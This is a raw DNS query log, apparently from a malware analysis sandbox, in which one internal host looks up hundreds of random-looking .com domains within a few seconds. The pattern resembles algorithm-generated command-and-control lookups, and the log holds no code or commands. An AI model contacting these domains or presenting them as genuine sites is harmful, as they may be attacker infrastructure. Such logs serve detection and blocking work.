Nov 11, 2024 18:13:15.220874071 CET	192.168.2.6	1.1.1.1	0x7bc3	Standard query (0)	qekysip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.221100092 CET	192.168.2.6	1.1.1.1	0xf2a8	Standard query (0)	qetykol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.221260071 CET	192.168.2.6	1.1.1.1	0xcd5	Standard query (0)	pufyxug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.221471071 CET	192.168.2.6	1.1.1.1	0xf428	Standard query (0)	pujypup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.221869946 CET	192.168.2.6	1.1.1.1	0x509e	Standard query (0)	puvybeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.222080946 CET	192.168.2.6	1.1.1.1	0x5d6f	Standard query (0)	gahypus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.222395897 CET	192.168.2.6	1.1.1.1	0xf935	Standard query (0)	lyryjir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.222704887 CET	192.168.2.6	1.1.1.1	0x91fa	Standard query (0)	puzybep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.222929001 CET	192.168.2.6	1.1.1.1	0xa877	Standard query (0)	vojypuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.225310087 CET	192.168.2.6	1.1.1.1	0x1b3d	Standard query (0)	pumyjig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.225454092 CET	192.168.2.6	1.1.1.1	0x3bb8	Standard query (0)	vocybam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.727499008 CET	192.168.2.6	1.1.1.1	0x6e93	Standard query (0)	lygytyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.727660894 CET	192.168.2.6	1.1.1.1	0x8fdb	Standard query (0)	vowyjut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.728368044 CET	192.168.2.6	1.1.1.1	0x3c9	Standard query (0)	pufytev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.728368044 CET	192.168.2.6	1.1.1.1	0x1e03	Standard query (0)	qexyvoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.733819008 CET	192.168.2.6	1.1.1.1	0xd7c4	Standard query (0)	puzyciq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.733922958 CET	192.168.2.6	1.1.1.1	0xda9d	Standard query (0)	gadyrab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.735143900 CET	192.168.2.6	1.1.1.1	0x296e	Standard query (0)	vofyref.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.743915081 CET	192.168.2.6	1.1.1.1	0xc0f0	Standard query (0)	qeqyhup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.750824928 CET	192.168.2.6	1.1.1.1	0x7e47	Standard query (0)	lyxyvoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.751467943 CET	192.168.2.6	1.1.1.1	0x4f77	Standard query (0)	galypyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.762825966 CET	192.168.2.6	1.1.1.1	0xb04e	Standard query (0)	gaqynyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.763643980 CET	192.168.2.6	1.1.1.1	0xd2c1	Standard query (0)	qegylep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.764081955 CET	192.168.2.6	1.1.1.1	0x13df	Standard query (0)	vocydof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.772142887 CET	192.168.2.6	1.1.1.1	0x96cd	Standard query (0)	ganyfes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.788175106 CET	192.168.2.6	1.1.1.1	0x4dae	Standard query (0)	qekyxul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.793657064 CET	192.168.2.6	1.1.1.1	0x6cc5	Standard query (0)	lyvyvix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.793838978 CET	192.168.2.6	1.1.1.1	0xd857	Standard query (0)	vonygec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.797879934 CET	192.168.2.6	1.1.1.1	0x2c1e	Standard query (0)	gatyqih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.797909021 CET	192.168.2.6	1.1.1.1	0x5ee1	Standard query (0)	qedykiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.798305035 CET	192.168.2.6	1.1.1.1	0x3548	Standard query (0)	pujyteq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.800679922 CET	192.168.2.6	1.1.1.1	0x7434	Standard query (0)	vopyjuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.803045034 CET	192.168.2.6	1.1.1.1	0x1c32	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.803663969 CET	192.168.2.6	1.1.1.1	0xc5c3	Standard query (0)	vopyqim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.804292917 CET	192.168.2.6	1.1.1.1	0xda0c	Standard query (0)	gahyzez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.806174040 CET	192.168.2.6	1.1.1.1	0x9258	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.806925058 CET	192.168.2.6	1.1.1.1	0xddf0	Standard query (0)	vojyrak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.809609890 CET	192.168.2.6	1.1.1.1	0x6dd0	Standard query (0)	lysyjid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.809784889 CET	192.168.2.6	1.1.1.1	0xd29c	Standard query (0)	qebyvop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.842166901 CET	192.168.2.6	1.1.1.1	0x1c05	Standard query (0)	pupyjuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.846038103 CET	192.168.2.6	1.1.1.1	0x5b85	Standard query (0)	lysywon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.846766949 CET	192.168.2.6	1.1.1.1	0x69ec	Standard query (0)	lykytej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.847090006 CET	192.168.2.6	1.1.1.1	0xa3b6	Standard query (0)	galycuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.847290993 CET	192.168.2.6	1.1.1.1	0xa334	Standard query (0)	puvydov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.847479105 CET	192.168.2.6	1.1.1.1	0xebd4	Standard query (0)	ganyvoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.849185944 CET	192.168.2.6	1.1.1.1	0xd9c9	Standard query (0)	lykyxur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.849411964 CET	192.168.2.6	1.1.1.1	0x9d1e	Standard query (0)	vonybat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.850152016 CET	192.168.2.6	1.1.1.1	0x4eb0	Standard query (0)	puvycip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.850337029 CET	192.168.2.6	1.1.1.1	0x48e0	Standard query (0)	gaqyhuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.850492954 CET	192.168.2.6	1.1.1.1	0xb3ef	Standard query (0)	pumygyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.850661993 CET	192.168.2.6	1.1.1.1	0x6419	Standard query (0)	lymygyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.850837946 CET	192.168.2.6	1.1.1.1	0x5203	Standard query (0)	volycik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.850991964 CET	192.168.2.6	1.1.1.1	0x706	Standard query (0)	pupywog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.851152897 CET	192.168.2.6	1.1.1.1	0x1d9	Standard query (0)	vowymyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.851367950 CET	192.168.2.6	1.1.1.1	0xff42	Standard query (0)	qedyrag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.851527929 CET	192.168.2.6	1.1.1.1	0x262c	Standard query (0)	vojyzyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.851671934 CET	192.168.2.6	1.1.1.1	0x3851	Standard query (0)	lygylax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.851887941 CET	192.168.2.6	1.1.1.1	0x991e	Standard query (0)	pumybal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.852113008 CET	192.168.2.6	1.1.1.1	0x2d02	Standard query (0)	purymuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.852461100 CET	192.168.2.6	1.1.1.1	0xd21	Standard query (0)	qeqynel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.852632999 CET	192.168.2.6	1.1.1.1	0xe279	Standard query (0)	gadykos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.852804899 CET	192.168.2.6	1.1.1.1	0xd72f	Standard query (0)	puzypug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.852962017 CET	192.168.2.6	1.1.1.1	0xcd7d	Standard query (0)	vofykoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.853467941 CET	192.168.2.6	1.1.1.1	0xd49f	Standard query (0)	qexysig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.853646994 CET	192.168.2.6	1.1.1.1	0xac07	Standard query (0)	lyxysun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.854269981 CET	192.168.2.6	1.1.1.1	0x6af1	Standard query (0)	pufylap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.854336977 CET	192.168.2.6	1.1.1.1	0x981e	Standard query (0)	pujyxyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.868539095 CET	192.168.2.6	1.1.1.1	0xf07	Standard query (0)	gacydib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.868841887 CET	192.168.2.6	1.1.1.1	0x9622	Standard query (0)	lyvyfad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.869626999 CET	192.168.2.6	1.1.1.1	0xeb6c	Standard query (0)	qekytyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.870423079 CET	192.168.2.6	1.1.1.1	0xac8f	Standard query (0)	qetyquq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.870585918 CET	192.168.2.6	1.1.1.1	0x6fc8	Standard query (0)	volypum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.870970011 CET	192.168.2.6	1.1.1.1	0x63a6	Standard query (0)	lymyner.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.874783993 CET	192.168.2.6	1.1.1.1	0x7fc1	Standard query (0)	lyrymuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.875032902 CET	192.168.2.6	1.1.1.1	0x6652	Standard query (0)	qebyfav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.294698954 CET	192.168.2.6	1.1.1.1	0xde18	Standard query (0)	qedyhyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.295420885 CET	192.168.2.6	1.1.1.1	0x3726	Standard query (0)	pumycug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.303662062 CET	192.168.2.6	1.1.1.1	0x92c7	Standard query (0)	galyros.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.347187996 CET	192.168.2.6	1.1.1.1	0xb2b8	Standard query (0)	lysyger.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.504586935 CET	192.168.2.6	1.1.1.1	0xe061	Standard query (0)	vonycum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.581294060 CET	192.168.2.6	1.1.1.1	0x5a15	Standard query (0)	vopygat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.581412077 CET	192.168.2.6	1.1.1.1	0x1ef9	Standard query (0)	qebyxyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.585825920 CET	192.168.2.6	1.1.1.1	0x6f6c	Standard query (0)	gaqyvob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.587040901 CET	192.168.2.6	1.1.1.1	0x62e6	Standard query (0)	qegykiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.619956017 CET	192.168.2.6	1.1.1.1	0x8737	Standard query (0)	lygywor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.620176077 CET	192.168.2.6	1.1.1.1	0x7a3c	Standard query (0)	gacycus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.620312929 CET	192.168.2.6	1.1.1.1	0xad13	Standard query (0)	qexyxuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.656531096 CET	192.168.2.6	1.1.1.1	0xc49d	Standard query (0)	vofyjuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.656572104 CET	192.168.2.6	1.1.1.1	0xdb7d	Standard query (0)	purygeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.656918049 CET	192.168.2.6	1.1.1.1	0xe18a	Standard query (0)	purybav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.656959057 CET	192.168.2.6	1.1.1.1	0x6ea4	Standard query (0)	gacypyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.657284021 CET	192.168.2.6	1.1.1.1	0xfcc2	Standard query (0)	gahykih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.657605886 CET	192.168.2.6	1.1.1.1	0xbea8	Standard query (0)	vowybof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.657643080 CET	192.168.2.6	1.1.1.1	0x687b	Standard query (0)	gaqyfah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.658221006 CET	192.168.2.6	1.1.1.1	0xe55	Standard query (0)	lygyjuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.658302069 CET	192.168.2.6	1.1.1.1	0x69d5	Standard query (0)	lymyvin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659024000 CET	192.168.2.6	1.1.1.1	0x3b4a	Standard query (0)	vofyqit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659095049 CET	192.168.2.6	1.1.1.1	0xe615	Standard query (0)	lyxyxyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659351110 CET	192.168.2.6	1.1.1.1	0xc899	Standard query (0)	gahyraw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659459114 CET	192.168.2.6	1.1.1.1	0x1dd3	Standard query (0)	vocypyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659634113 CET	192.168.2.6	1.1.1.1	0xf7ce	Standard query (0)	pumydoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659760952 CET	192.168.2.6	1.1.1.1	0x563d	Standard query (0)	galyzeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.659905910 CET	192.168.2.6	1.1.1.1	0xb619	Standard query (0)	volyzef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.660075903 CET	192.168.2.6	1.1.1.1	0xd9f1	Standard query (0)	qeqyvig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.660201073 CET	192.168.2.6	1.1.1.1	0xb17f	Standard query (0)	vocycuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.660451889 CET	192.168.2.6	1.1.1.1	0xe54b	Standard query (0)	qegyrol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.660640955 CET	192.168.2.6	1.1.1.1	0xdabb	Standard query (0)	gadyhyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.661329031 CET	192.168.2.6	1.1.1.1	0xe4e4	Standard query (0)	lyxytex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.661350965 CET	192.168.2.6	1.1.1.1	0x33a8	Standard query (0)	lyrynad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.684067011 CET	192.168.2.6	1.1.1.1	0x56aa	Standard query (0)	puzytap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.686939955 CET	192.168.2.6	1.1.1.1	0x8d23	Standard query (0)	pupygel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.687094927 CET	192.168.2.6	1.1.1.1	0xa811	Standard query (0)	pufyjuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.687232018 CET	192.168.2.6	1.1.1.1	0x28b1	Standard query (0)	vojykom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.687417984 CET	192.168.2.6	1.1.1.1	0xe015	Standard query (0)	lymyfoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.688131094 CET	192.168.2.6	1.1.1.1	0xe020	Standard query (0)	qexytep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.688533068 CET	192.168.2.6	1.1.1.1	0xf452	Standard query (0)	qebysul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.707995892 CET	192.168.2.6	1.1.1.1	0x540d	Standard query (0)	qekylag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.709314108 CET	192.168.2.6	1.1.1.1	0x3dff	Standard query (0)	vopymyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.709676027 CET	192.168.2.6	1.1.1.1	0x5f6d	Standard query (0)	lykylan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.710406065 CET	192.168.2.6	1.1.1.1	0x5ee2	Standard query (0)	ganydiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.710767984 CET	192.168.2.6	1.1.1.1	0xeb53	Standard query (0)	lykywid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.716993093 CET	192.168.2.6	1.1.1.1	0x91a6	Standard query (0)	puzyxyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.718688011 CET	192.168.2.6	1.1.1.1	0xa52f	Standard query (0)	pupymyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.719506979 CET	192.168.2.6	1.1.1.1	0x374f	Standard query (0)	vonydik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.719902039 CET	192.168.2.6	1.1.1.1	0x606d	Standard query (0)	ganycuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.720427990 CET	192.168.2.6	1.1.1.1	0x2dd2	Standard query (0)	qetynev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.720635891 CET	192.168.2.6	1.1.1.1	0x9f48	Standard query (0)	gadyquz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.724400043 CET	192.168.2.6	1.1.1.1	0xe078	Standard query (0)	vowygem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.724544048 CET	192.168.2.6	1.1.1.1	0x4727	Standard query (0)	qeqyfaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.724802017 CET	192.168.2.6	1.1.1.1	0xde07	Standard query (0)	lyrygyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.724818945 CET	192.168.2.6	1.1.1.1	0x5462	Standard query (0)	pufywil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.725469112 CET	192.168.2.6	1.1.1.1	0xeb20	Standard query (0)	gatynes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.725645065 CET	192.168.2.6	1.1.1.1	0x40f2	Standard query (0)	qedyqup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.726093054 CET	192.168.2.6	1.1.1.1	0xe5ac	Standard query (0)	lysymux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.726330996 CET	192.168.2.6	1.1.1.1	0x8436	Standard query (0)	volyrac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.726824999 CET	192.168.2.6	1.1.1.1	0x3b4	Standard query (0)	lyvysur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.731472015 CET	192.168.2.6	1.1.1.1	0x2431	Standard query (0)	puvypul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.731687069 CET	192.168.2.6	1.1.1.1	0x7df0	Standard query (0)	qekyrov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.743421078 CET	192.168.2.6	1.1.1.1	0x6846	Standard query (0)	pujylog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.257817984 CET	192.168.2.6	1.1.1.1	0x9a0c	Standard query (0)	pujywiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.274061918 CET	192.168.2.6	1.1.1.1	0x2fb4	Standard query (0)	qetyfop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.276560068 CET	192.168.2.6	1.1.1.1	0x2a17	Standard query (0)	vonyzac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.277817965 CET	192.168.2.6	1.1.1.1	0x2e84	Standard query (0)	lyvyxyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.278310061 CET	192.168.2.6	1.1.1.1	0x9118	Standard query (0)	gatyfaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.281363964 CET	192.168.2.6	1.1.1.1	0xa05e	Standard query (0)	qeqyxyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.334505081 CET	192.168.2.6	1.1.1.1	0x519a	Standard query (0)	volyquk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.344115973 CET	192.168.2.6	1.1.1.1	0xd428	Standard query (0)	vowycut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.351856947 CET	192.168.2.6	1.1.1.1	0xac5c	Standard query (0)	galyquw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.373157978 CET	192.168.2.6	1.1.1.1	0xa9d9	Standard query (0)	galykiz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.404264927 CET	192.168.2.6	1.1.1.1	0x915d	Standard query (0)	pupyboq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.404880047 CET	192.168.2.6	1.1.1.1	0x95cb	Standard query (0)	qekykup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.405738115 CET	192.168.2.6	1.1.1.1	0x12ea	Standard query (0)	lykyjux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.405958891 CET	192.168.2.6	1.1.1.1	0x6ea0	Standard query (0)	pujyjup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.408365965 CET	192.168.2.6	1.1.1.1	0xf2da	Standard query (0)	qebyteg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.408849955 CET	192.168.2.6	1.1.1.1	0x4d07	Standard query (0)	vopybok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.409190893 CET	192.168.2.6	1.1.1.1	0x4190	Standard query (0)	gatyviw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.412288904 CET	192.168.2.6	1.1.1.1	0x551a	Standard query (0)	vonypyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.412700891 CET	192.168.2.6	1.1.1.1	0xa7af	Standard query (0)	gahyqub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.413000107 CET	192.168.2.6	1.1.1.1	0xb41f	Standard query (0)	gacyroh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.413888931 CET	192.168.2.6	1.1.1.1	0xc1fb	Standard query (0)	qexylal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.414747953 CET	192.168.2.6	1.1.1.1	0xeb7f	Standard query (0)	qegyhev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.415249109 CET	192.168.2.6	1.1.1.1	0x70f9	Standard query (0)	purycul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.415486097 CET	192.168.2.6	1.1.1.1	0x95ac	Standard query (0)	qedyfog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.416460991 CET	192.168.2.6	1.1.1.1	0xafa0	Standard query (0)	lyryvur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.420135975 CET	192.168.2.6	1.1.1.1	0x4fb0	Standard query (0)	lyryfox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.420393944 CET	192.168.2.6	1.1.1.1	0x7892	Standard query (0)	gahyhys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.422316074 CET	192.168.2.6	1.1.1.1	0x7925	Standard query (0)	puvytag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.423918009 CET	192.168.2.6	1.1.1.1	0x4df7	Standard query (0)	qegyqug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.424185991 CET	192.168.2.6	1.1.1.1	0x9377	Standard query (0)	gacyzaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.426924944 CET	192.168.2.6	1.1.1.1	0x8123	Standard query (0)	purydip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.427092075 CET	192.168.2.6	1.1.1.1	0x61da	Standard query (0)	lygymyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.427422047 CET	192.168.2.6	1.1.1.1	0x5ae7	Standard query (0)	pumypyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.427664042 CET	192.168.2.6	1.1.1.1	0x9201	Standard query (0)	vojyjyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.428262949 CET	192.168.2.6	1.1.1.1	0x281f	Standard query (0)	ganypeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.428484917 CET	192.168.2.6	1.1.1.1	0xfc46	Standard query (0)	qedynaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.428813934 CET	192.168.2.6	1.1.1.1	0x8ac5	Standard query (0)	pufymyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.429059982 CET	192.168.2.6	1.1.1.1	0x1678	Standard query (0)	lymyxex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.429398060 CET	192.168.2.6	1.1.1.1	0x3abd	Standard query (0)	lysyfin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.429589987 CET	192.168.2.6	1.1.1.1	0xf5bc	Standard query (0)	vocyrom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.429902077 CET	192.168.2.6	1.1.1.1	0x5ad0	Standard query (0)	lyxywij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.430074930 CET	192.168.2.6	1.1.1.1	0x37b9	Standard query (0)	qexyriq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.430229902 CET	192.168.2.6	1.1.1.1	0x12fd	Standard query (0)	lyvytan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.430468082 CET	192.168.2.6	1.1.1.1	0x1255	Standard query (0)	lygyged.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.442487001 CET	192.168.2.6	1.1.1.1	0x8766	Standard query (0)	lysynaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.442930937 CET	192.168.2.6	1.1.1.1	0xa9f7	Standard query (0)	pumyxep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.444602013 CET	192.168.2.6	1.1.1.1	0xfb6a	Standard query (0)	qetyvil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.445497036 CET	192.168.2.6	1.1.1.1	0x790	Standard query (0)	qeqysuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.445676088 CET	192.168.2.6	1.1.1.1	0xb53a	Standard query (0)	gadyfob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.445816994 CET	192.168.2.6	1.1.1.1	0x7d8e	Standard query (0)	lymysud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.446042061 CET	192.168.2.6	1.1.1.1	0x19c2	Standard query (0)	vocyzek.com	A (IP address)	IN (0x0001)	false
